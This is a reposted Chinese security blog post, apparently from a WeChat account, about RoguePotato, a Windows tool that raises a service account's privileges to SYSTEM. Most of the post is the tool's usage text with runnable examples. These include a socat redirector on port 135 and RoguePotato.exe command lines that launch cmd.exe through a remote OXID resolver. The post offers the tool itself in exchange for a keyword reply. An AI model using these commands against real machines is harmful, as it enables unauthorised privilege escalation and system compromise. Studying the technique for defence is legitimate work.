Windows提权之RoguePotato

admin 2023年3月25日00:48:49评论37 views字数 1204阅读4分0秒阅读模式

提权介绍

从服务帐户到系统的Windows本地权限升级

权限提升

        RoguePotato        @splinter_code & @decoder_it

Mandatory args:-r remote_ip: ip of the remote machine to use as redirector-e commandline: commandline of the program to launch

Optional args:-l listening_port: This will run the RogueOxidResolver locally on the specified port-c {clsid}: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})-p pipename_placeholder: placeholder to be used in the pipe name creation (default: RoguePotato)-z : this flag will randomize the pipename_placeholder (don't use with -p)

Examples: - Network redirector / port forwarder to run on your remote machine, must use port 135 as src port socat tcp-listen:135,reuseaddr,fork tcp:10.0.0.3:9999 - RoguePotato without running RogueOxidResolver locally. You should run the RogueOxidResolver.exe on your remote machine. Use this if you have fw restrictions. RoguePotato.exe -r 10.0.0.3 -e "C:windowssystem32cmd.exe" - RoguePotato all in one with RogueOxidResolver running locally on port 9999 RoguePotato.exe -r 10.0.0.3 -e "C:windowssystem32cmd.exe" -l 9999 - RoguePotato all in one with RogueOxidResolver running locally on port 9999 and specific clsid and custom pipename RoguePotato.exe -r 10.0.0.3 -e "C:windowssystem32cmd.exe" -l 9999 -c "{6d8ff8e1-730d-11d4-bf42-00b0d0118b56}" -p splintercode

Windows提权之RoguePotato

项目获取

后台回复"提权001"获取提权工具


原文始发于微信公众号(七芒星实验室):Windows提权之RoguePotato

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月25日00:48:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows提权之RoguePotatohttp://cn-sec.com/archives/1627970.html

发表评论

匿名网友 填写信息